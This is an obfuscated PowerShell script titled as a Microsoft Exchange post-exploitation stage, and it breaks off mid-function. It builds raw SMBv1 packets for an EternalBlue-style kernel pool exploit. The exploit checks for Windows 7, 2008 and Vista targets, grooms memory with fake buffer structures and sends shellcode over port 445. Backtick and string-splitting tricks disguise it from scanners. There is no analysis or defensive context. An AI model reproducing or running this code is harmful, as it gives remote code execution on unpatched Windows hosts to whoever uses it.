Microsoft Exchange Post-Exploitation Artifacts stage #5
function make_smb1_anonymous_login_packet {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x48
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2f,0x4b
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x0d
$pkt += 0xff
$pkt += 0x00
$pkt += 0x00,0x00
$pkt += 0x00,0xf0
$pkt += 0x02,0x00
$pkt += 0x2f,0x4b
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x41,0xc0,0x00,0x00
$pkt += 0x0b,0x00
$pkt += 0x00,0x00
$pkt += 0x6e,0x74,0x00
$pkt += 0x70,0x79,0x73,0x6d,0x62,0x00
return $pkt
}
function smb1_anonymous_login($sock){
$raw_proto = M`A`K`e_Smb1_`ANoNy`mOus`_LO`gin_Pa`C`kET
$sock.Send($raw_proto) | OUT-`NulL
return smb1_Get`_`Res`Po`NsE($sock)
}
function negotiate_proto_request(){
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x2f
$pkt += 0xFF,0x53,0x4D,0x42
$pkt += 0x72
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2F,0x4B
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00
$pkt += 0x0c,0x00
$pkt += 0x02
$pkt += 0x4E,0x54,0x20,0x4C,0x4D,0x20,0x30,0x2E,0x31,0x32,0x00
return $pkt
}
function smb_header($smbheader) {
$parsed_header =@{server_component=$smbheader[0..3];
smb_command=$smbheader[4];
error_class=$smbheader[5];
reserved1=$smbheader[6];
error_code=$smbheader[6..7];
flags=$smbheader[8];
flags2=$smbheader[9..10];
process_id_high=$smbheader[11..12];
signature=$smbheader[13..21];
reserved2=$smbheader[22..23];
tree_id=$smbheader[24..25];
process_id=$smbheader[26..27];
user_id=$smbheader[28..29];
multiplex_id=$smbheader[30..31];
}
return $parsed_header
}
function smb1_get_response($sock){
$tcp_response = [Array]::CreateInstance(('b'+'yte'), 1024)
try{
$sock.Receive($tcp_response)| O`U`T-NULl
}
catch {
}
$netbios = $tcp_response[0..4]
$smb_header = $tcp_response[4..36]
$parsed_header = smB_h`e`ADeR($smb_header)
return $tcp_response, $parsed_header
}
function client_negotiate($sock){
$raw_proto = n`egOtiaT`e_Pr`ot`o_R`EQUEst
$sock.Send($raw_proto) | OuT`-n`ULL
return sM`B1_`geT_`REsponSe($sock)
}
function tree_connect_andx($sock, $target, $userid){
$raw_proto = tr`eE_cO`Nn`ECT_an`d`X_R`EQUEST $target $userid
$sock.Send($raw_proto) | ou`T-nULl
return sM`B1`_get_`Respo`Nse($sock)
}
function tree_connect_andx_request($target, $userid) {
[Byte[]] $pkt = [Byte[]](0x00)
$pkt +=0x00,0x00,0x48
$pkt +=0xFF,0x53,0x4D,0x42
$pkt +=0x75
$pkt +=0x00,0x00,0x00,0x00
$pkt +=0x18
$pkt +=0x01,0x48
$pkt +=0x00,0x00
$pkt +=0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$pkt +=0x00,0x00
$pkt +=0xff,0xff
$pkt +=0x2F,0x4B
$pkt += $userid
$pkt +=0x00,0x00
$ipc = (('SW'+'0SW0') -rePLACe'SW0',[Char]92)+ $target + "\IPC$"
$pkt +=0x04
$pkt +=0xFF
$pkt +=0x00
$pkt +=0x00,0x00
$pkt +=0x00,0x00
$pkt +=0x01,0x00
$al=[system.Text.Encoding]::ASCII.GetBytes($ipc).Count+8
$pkt+=[bitconverter]::GetBytes($al)[0],0x00
$pkt +=0x00
$pkt += [system.Text.Encoding]::ASCII.GetBytes($ipc)
$pkt += 0x00
$pkt += 0x3f,0x3f,0x3f,0x3f,0x3f,0x00
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function smb1_anonymous_connect_ipc($target){
$client = NE`W-`obj`EcT System.Net.Sockets.TcpClient($target,445)
$sock = $client.Client
C`liEnt`_n`egO`TiATe($sock) | O`Ut-`NuLl
$raw, $smbheader = Sm`B`1_A`NONyMO`US_LOgIN $sock
$raw, $smbheader = TrEe_c`O`N`N`eCT_aNDX $sock $target $smbheader.user_id
return $smbheader, $sock
}
function make_smb1_nt_trans_packet($tree_id, $user_id) {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x08,0x3C
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0xa0
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += $tree_id
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x14
$pkt += 0x01
$pkt += 0x00,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x16,0x00,0x01,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x4c,0x00,0x00,0x00
$pkt += 0xd0,0x07,0x00,0x00
$pkt += 0x6c,0x00,0x00,0x00
$pkt += 0x01
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xf1,0x07
$pkt += 0xff
$pkt += [Byte[]] (0x00) * 0x1e
$pkt += 0xff,0xff,0x00,0x00,0x01
$pkt += [Byte[]](0x00) * 0x7CD
return $pkt
}
function make_smb1_trans2_exploit_packet($tree_id, $user_id, $data, $timeout) {
$timeout = ($timeout * 0x10) + 7
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x10,0x38
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x33
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += $tree_id
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x09
$pkt += 0x00,0x00
$pkt += 0x00,0x10
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00
$pkt += 0x00
$pkt += 0x00,0x10
$pkt += 0x38,0x00,0xd0
$pkt += [bitconverter]::GetBytes($timeout)[0]
$pkt += 0x00,0x00
$pkt += 0x03,0x10
$pkt += 0xff,0xff,0xff
$pkt +=$data
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function make_smb1_trans2_last_packet($tree_id, $user_id, $data, $timeout) {
$timeout = ($timeout * 0x10) + 7
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x08,0x7e
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x33
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += $tree_id
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x09
$pkt += 0x00,0x00
$pkt += 0x46,0x08
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00
$pkt += 0x00
$pkt += 0x46,0x08
$pkt += 0x38,0x00,0xd0
$pkt += [bitconverter]::GetBytes($timeout)[0]
$pkt += 0x00,0x00
$pkt += 0x49,0x08
$pkt += 0xff,0xff,0xff
$pkt +=$data
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function send_big_trans2($sock, $smbheader, $data, $firstDataFragmentSize, $sendLastChunk){
$nt_trans_pkt = m`A`kE_sMB1_`N`T_TRAn`s`_pAckEt $smbheader.tree_id $smbheader.user_id
$sock.Send($nt_trans_pkt) | O`Ut-nULl
$raw, $transheader = sMb1_G`eT_ResPo`N`sE($sock)
$i=$firstDataFragmentSize
$timeout=0
while ($i -lt $data.count)
{
$sendSize=[System.Math]::Min(4096,($data.count-$i))
if (($data.count-$i) -le 4096){
if (!$sendLastChunk)
{ break }
}
$trans2_pkt = MA`k`E_SmB1_Tr`A`Ns2_EXpl`o`It_`PAcKET $smbheader.tree_id $smbheader.user_id $data[$i..($i+$sendSize-1)] $timeout
$sock.Send($trans2_pkt) | OuT`-nUll
$timeout+=1
$i +=$sendSize
}
if ($sendLastChunk)
{Smb`1_`GeT_ReSPo`NsE($sock) }
return $i,$timeout
}
function createSessionAllocNonPaged($target, $size) {
$client = n`Ew-O`B`JECT System.Net.Sockets.TcpClient($target,445)
$sock = $client.Client
CL`i`E`Nt_N`EgotiATE($sock) | O`U`T-Null
$flags2=16385
if ($size -ge 0xffff)
{ $reqsize=$size /2}
else
{
$flags2 =49153
$reqsize= $size
}
if($flags2 -eq 49153) {
$pkt = makE`_SmB`1_`FRee_hOlE_SEs`si`on`_P`ACKeT (0x01,0xc0) (0x02,0x00) (0xf0,0xff,0x00,0x00,0x00)
}
else {
$pkt = m`AKE_smB1_f`RE`e_hO`l`E_sESsiO`N_P`A`cK`eT (0x01,0x40) (0x02,0x00) (0xf8,0x87,0x00,0x00,0x00)
}
$sock.Send($pkt) | OUt-`Nu`Ll
sMb1_`GEt_R`eSp`ONSE($sock) | oUt`-N`ULl
return $sock
}
function make_smb1_free_hole_session_packet($flags2, $vcnum, $native_os) {
[Byte[]] $pkt = 0x00
$pkt += 0x00,0x00,0x51
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += $flags2
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2f,0x4b
$pkt += 0x00,0x00
$pkt += 0x40,0x00
$pkt += 0x0c
$pkt += 0xff
$pkt += 0x00
$pkt += 0x00,0x00
$pkt += 0x00,0xf0
$pkt += 0x02,0x00
$pkt += $vcnum
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x80
$pkt += 0x16,0x00
$pkt += $native_os
$pkt += [Byte[]] (0x00) * 17
return $pkt
}
function smb2_grooms($target, $grooms, $payload_hdr_pkt, $groom_socks){
for($i =0; $i -lt $grooms; $i++)
{
$client = neW-o`B`jEct System.Net.Sockets.TcpClient($target,445)
$gsock = $client.Client
$groom_socks += $gsock
$gsock.Send($payload_hdr_pkt) | O`Ut-`NuLl
}
return $groom_socks
}
function make_smb2_payload_headers_packet(){
[Byte[]] $pkt = [Byte[]](0x00,0x00,0xff,0xf7,0xFE) + [system.Text.Encoding]::ASCII.GetBytes(('S'+'MB')) + [Byte[]](0x00)*124
return $pkt
}
function eb7($target ,$shellcode) {
$NTFEA_SIZE = 0x11000
$ntfea10000=0x00,0x00,0xdd,0xff+[byte[]]0x41*0xffde
$ntfea11000 =(0x00,0x00,0x00,0x00,0x00)*600
$ntfea11000 +=0x00,0x00,0xbd,0xf3+[byte[]]0x41*0xf3be
$ntfea1f000=(0x00,0x00,0x00,0x00,0x00)*0x2494
$ntfea1f000=0x00,0x00,0xed,0x48+0x41*0x48ee
$ntfea=@{0x10000=$ntfea10000;0x11000=$ntfea11000}
$TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
$TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
[byte[]]$fakeSrvNetBufferNsa = @(0x00,0x10,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x01,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf1,0xdf,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0xf0,0xdf,0xff,0x00,0xf1,0xdf,0xff,0x00,0x00,0x00,0x00,0x60,0x00,0x04,0x10,0x00,0x00,0x00,0x00,0x80,0xef,0xdf,0xff,0x00,0x00,0x00,0x00,0x10,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0x10,0x01,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x04,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,0xff,0xcf,0xff,0xff,0xff,0xff,0xff)
[byte[]]$fakeSrvNetBufferX64 = @(0x00,0x10,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x01,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0x10,0x01,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x04,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,0xff,0xcf,0xff,0xff,0xff,0xff,0xff)
$fakeSrvNetBuffer = $fakeSrvNetBufferNsa
[byte[]]$feaList=[byte[]](0x00,0x00,0x01,0x00)
$feaList += $ntfea[$NTFEA_SIZE]
$feaList +=0x00,0x00,0x8f,0x00+ $fakeSrvNetBuffer
$feaList +=0x12,0x34,0x78,0x56
[byte[]]$fake_recv_struct=@(0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb0,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0xb0,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0xf0,0xdf,0xff,0xc0,0xf0,0xdf,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x
00,0x00,0x90,0xf1,0xdf,0xff,0x00,0x00,0x00,0x00,0xef,0xf1,0xdf,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0x01,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0x01,0xd0,0xff,0xff,0xff,0xff,0xff)
$client = n`Ew-oBj`EcT System.Net.Sockets.TcpClient($target,445)
$sock = $client.Client
$sock.ReceiveTimeout =5000
clIe`NT_N`E`GoTI`Ate($sock) | out-`NulL
$raw, $smbheader = sm`B`1_`AnONYmOu`S`_loG`In $sock
$os=[system.Text.Encoding]::ascii.GetString($raw[45..($raw.count-1)]).ToLower()
if (!(($os.contains(('windows'+' '+'7'))) -or ($os.contains(('wi'+'nd'+'ows')) -and $os.contains(('200'+'8'))) -or ($os.contains(('w'+'indo'+'w'+'s vi'+'sta'))) -or ($os.contains(('wind'+'o'+'ws')) -and $os.contains(('201'+'1')))))
{return $False}
$raw, $smbheader = t`Ree_co`N`NECt_AnDx $sock $target $smbheader.user_id
$progress , $timeout= Se`N`d`_B`Ig_tRanS2 $sock $smbheader $feaList 2000 $False
$allocConn = CReA`T`EsES`SIONaL`loCnon`pagEd $target ($NTFEA_SIZE - 0x1010)
$payload_hdr_pkt = mAkE`_smb2`_paYlOad_HE`AdE`RS_`Pa`cKEt
$groom_socks =@()
for ($i=0; $i -lt 13; $i++)
{
$client = n`ew-Ob`jE`ct System.Net.Sockets.TcpClient($target,445)
$gsock = $client.Client
$groom_socks += $gsock
$gsock.Send($payload_hdr_pkt) | oUt`-n`ULL
}
$holeConn = Cr`EAteseSs`i`o`N`ALLoc`N`Onp`AGEd $target ($NTFEA_SIZE - 0x10)
$allocConn.close()
for ($i=0; $i -lt 5; $i++)
{
$client = n`Ew-oBj`ecT System.Net.Sockets.TcpClient($target,445)
$gsock = $client.Client
$groom_socks += $gsock
$gsock.Send($payload_hdr_pkt) | OUT-NU`lL
}
$holeConn.close()
$trans2_pkt = maKe`_Smb1`_Tran`S2_lasT`_PAc`KET $smbheader.tree_id $smbheader.user_id $feaList[$progress..$feaList.count] $timeout
$sock.Send($trans2_pkt) | o`UT-n`ULl
$raw, $trans2header = sMB`1`_gET_resp`O`Nse($sock)
foreach ($sk in $groom_socks)
{
$sk.Send($fake_recv_struct + $shellcode) | O`UT-N`Ull
}
foreach ($sk in $groom_socks)
{
$sk.close() | o`Ut-`NUlL
}
$sock.Close()| Ou`T-NulL
return $True
}
function createFakeSrvNetBuffer8($sc_size)
{
$totalRecvSize = 0x80 + 0x180 + $sc_size
$fakeSrvNetBufferX64 = [byte[]]0x00*16
$fakeSrvNetBufferX64 += 0xf0,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0xd0,0xff,0xff,0xff,0xff,0xff
$fakeSrvNetBufferX64 += 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe8,0x82,0x00,0x00,0x00,0x00,0x00,0x00
$fakeSrvNetBufferX64 += [byte[]]0x00*16
$a=[bitconverter]::GetBytes($totalRecvSize)
$fakeSrvNetBufferX64 += [byte[]]0x00*8+$a+[byte[]]0x00*4
$fakeSrvNetBufferX64 += 0x00,0x40,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x40,0xd0,0xff,0xff,0xff,0xff,0xff
$fakeSrvNetBufferX64 += [byte[]]0x00*48
$fakeSrvNetBufferX64 += 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x04,0x10,0x00,0x00,0x00,0x00
$fakeSrvNetBufferX64 += 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x3f,0xd0,0xff,0xff,0xff,0xff,0xff
return $fakeSrvNetBufferX64
}
function createFeaList8($sc_size, $ntfea){
$feaList = 0x00,0x00,0x01,0x00
$feaList += $ntfea
$fakeSrvNetBuf = CreateFAKEsRv`N`et`BuFfeR8($sc_size)
$a=[bitconverter]::GetBytes($fakeSrvNetBuf.Length-1)
$feaList += 0x00,0x00,$a[0],$a[1] + $fakeSrvNetBuf
$feaList += 0x12,0x34,0x78,0x56
return $feaList
}
function make_smb1_login8_packet8 {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x88
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2f,0x4b
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x0c
$pkt += 0xff
$pkt += 0x00
$pkt += 0x00,0x00
$pkt += 0x00,0xf0
$pkt += 0x02,0x00
$pkt += 0x01,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x42,0x00,0x00,0x00,0x00,0x00
$pkt += 0x44,0xc0,0x00,0x80
$pkt += 0x4d,0x00
$pkt += 0x60,0x40,0x06,0x06,0x2b,0x06,0x01,0x05,0x05,0x02,0xa0,0x36,0x30,0x34,0xa0,0x0e,0x30,0x0c,0x06,0x0a,0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a,0xa2,0x22,0x04,0x20,0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x01,0x00,0x00,0x00,0x05,0x02,0x88,0xa0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$pkt += 0x55,0x6e,0x69,0x78,0x00
$pkt += 0x53,0x61,0x6d,0x62,0x61,0x00
return $pkt
}
function make_ntlm_auth_packet8($user_id) {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x96
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x0c
$pkt += 0xff
$pkt += 0x00
$pkt += 0x00,0x00
$pkt += 0x00,0xf0
$pkt += 0x02,0x00
$pkt += 0x01,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x50,0x00,0x00,0x00,0x00,0x00
$pkt += 0x44,0xc0,0x00,0x80
$pkt += 0x5b,0x00
$pkt += 0xa1,0x4e,0x30,0x4c,0xa2,0x4a,0x04,0x48,0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x08,0x00,0x08,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x05,0x02,0x88,0xa0,0x4e,0x00,0x55,0x00,0x4c,0x00,0x4c,0x00
$pkt += 0x55,0x6e,0x69,0x78,0x00
$pkt += 0x53,0x61,0x6d,0x62,0x61,0x00
return $pkt
}
function smb1_login8($sock){
$raw_proto = maKe_smB`1_`L`oGIn8`_PAC`ke`T8
$sock.Send($raw_proto) | OU`T`-NulL
$raw, $smbheader=SMb`1_Ge`T_Re`sp`O`NsE8($sock)
$raw_proto = mA`K`E`_nTlM_`AU`TH_pACKE`T8($smbheader.user_id)
$sock.Send($raw_proto) | OU`T-`Null
return Sm`B1_g`eT_Re`Sp`ON`SE8($sock)
}
function negotiate_proto_request8($use_ntlm)
{
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x2f
$pkt += 0xFF,0x53,0x4D,0x42
$pkt += 0x72
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
if($use_ntlm){ $pkt += 0x01,0x48 }
else{ $pkt += 0x01,0x40 }
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2F,0x4B
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00
$pkt += 0x0c,0x00
$pkt += 0x02
$pkt += 0x4E,0x54,0x20,0x4C,0x4D,0x20,0x30,0x2E,0x31,0x32,0x00
return $pkt
}
function smb_header8($smbheader) {
$parsed_header =@{server_component=$smbheader[0..3];
smb_command=$smbheader[4];
error_class=$smbheader[5];
reserved1=$smbheader[6];
error_code=$smbheader[7..8];
flags=$smbheader[9];
flags2=$smbheader[10..11];
process_id_high=$smbheader[12..13];
signature=$smbheader[14..21];
reserved2=$smbheader[22..23];
tree_id=$smbheader[24..25];
process_id=$smbheader[26..27];
user_id=$smbheader[28..29];
multiplex_id=$smbheader[30..31];
}
return $parsed_header
}
function smb1_get_response8($sock){
$sock.ReceiveTimeout =5000
$tcp_response = [Array]::CreateInstance(('byt'+'e'), 1024)
try{
$sock.Receive($tcp_response)| OUt-NU`ll
}
catch {
return -1,-1
}
$netbios = $tcp_response[0..4]
$smb_header8 = $tcp_response[4..36]
$parsed_header = S`M`B_HeAde`R8($smb_header8)
return $tcp_response, $parsed_header
}
function client_negotiate8($sock , $use_ntlm){
$raw_proto = Negot`Ia`TE_P`ROT`O_requEST8($use_ntlm)
$sock.Send($raw_proto) | out`-`NulL
return smb1_g`eT_r`ES`Pon`se8($sock)
}
function tree_connect_andx8($sock, $target, $userid){
$raw_proto = tr`Ee_conneCT_aN`Dx`8_R`eQuESt $target $userid
$sock.Send($raw_proto) | OUT-Nu`lL
return S`Mb1_Get_`Re`s`pon`se8($sock)
}
function tree_connect_andx8_request($target, $userid) {
[Byte[]] $pkt = [Byte[]](0x00)
$pkt +=0x00,0x00,0x48
$pkt +=0xFF,0x53,0x4D,0x42
$pkt +=0x75
$pkt +=0x00,0x00,0x00,0x00
$pkt +=0x18
$pkt +=0x01,0x48
$pkt +=0x00,0x00
$pkt +=0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$pkt +=0x00,0x00
$pkt +=0xff,0xff
$pkt +=0x2F,0x4B
$pkt += $userid
$pkt +=0x00,0x00
$ipc = (('waJwaJ').replACE('waJ',[StrInG][CHar]92))+ $target + "\IPC$"
$pkt +=0x04
$pkt +=0xFF
$pkt +=0x00
$pkt +=0x00,0x00
$pkt +=0x00,0x00
$pkt +=0x01,0x00
$al=[system.Text.Encoding]::ASCII.GetBytes($ipc).Count+8
$pkt+=[bitconverter]::GetBytes($al)[0],0x00
$pkt +=0x00
